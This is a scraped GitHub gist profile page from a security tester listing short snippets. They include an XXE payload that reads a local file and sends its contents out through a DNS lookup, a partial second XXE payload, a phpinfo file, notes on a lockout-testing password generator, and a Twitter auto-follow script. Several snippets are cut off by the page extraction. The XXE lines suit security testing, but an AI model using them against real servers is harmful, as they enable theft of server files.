Skip to content

Instantly share code, notes, and snippets.

View marcwickenden's full-sized avatar

MW marcwickenden

View GitHub Profile
marcwickenden / oob-dns.xml
Created May 16, 2018 17:27
Example of data exfil using DNS in XXE. This will only work if the target file (/tmp/foo in this case) does not contain new lines. Good luck with that!
<!ENTITY % data SYSTEM "file:///tmp/foo">
<!ENTITY % url "<!ENTITY &#x25; exfil SYSTEM 'http://%data;'>">

Keybase proof

I hereby claim:

  • I am marcwickenden on github.
  • I am marcwickenden ( on keybase.
  • I have a public key ASD0R4SdJk8CnPiG_t4Y1LGCIbFQXlEM19O45DsoU4fMSwo

To claim this, I am signing this object:

marcwickenden / phpinfo.php
Created October 3, 2018 08:53
<?php phpinfo(); ?>
marcwickenden / XXE.xml
Created May 16, 2018 17:29
XXE payload to exploit dns exfil
<?xml version="1.0" ?>
<!ENTITY % oobfile SYSTEM "">
<?php phpinfo(); ?>
marcwickenden /
Created August 3, 2017 11:28
Generate payloads for testing account lockout with Intruder
# Usage: ./generate-intruder-passwords ThisisthecorrectPassword123 20
# The first argument is the correct password for the app.
# The second argument is the maximum number of password attempts to make.
# 20 is the default, if it hasn't locked you by then I'd say that's a finding.
# The script will simply increment up to $LIMIT outputting n incorrect passwords and then the correct one.
# We enter the correct one to potentially reset the incorrect count.
version: '2'
image: wordpress:4.7.1
- 8080:80
marcwickenden / 100sec.rb
Created November 21, 2013 19:02
Automatically follow the @Marble_Security top-100-security-experts list members. If that's useful to you! You'll need to supply valid OAuth credentials from (read-write). You also need the twitter gem installed: gem install twitter Then just ruby 100sec.rb
#!/usr/bin/env ruby
require 'twitter'
Twitter.configure do |config|
config.consumer_key = "<your consumer key>"
config.consumer_secret = "<your consumer secret>"
config.oauth_token = "<your oauth token>"
config.oauth_token_secret = "<your oauth token secret>"
marcwickenden / gist:7218936
Created October 29, 2013 17:22
Googlebot user agents
$ ruby apache_user_agent.rb
Mozilla/5.0 (compatible; Googlebot/2.1; +
SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/ (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +
Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25 (compatible; Googlebot-Mobile/2.1; +
marcwickenden / gist:4046089
Created November 9, 2012 14:46
exim 4.80-4.81 diff
diff -ruw exim-4.80/doc/ChangeLog exim-4.80.1/doc/ChangeLog
--- exim-4.80/doc/ChangeLog 2012-05-31 01:40:15.000000000 +0100
+++ exim-4.80.1/doc/ChangeLog 2012-10-25 04:37:38.000000000 +0100
@@ -1,6 +1,14 @@
Change log file for Exim from version 4.21
+Exim version 4.80.1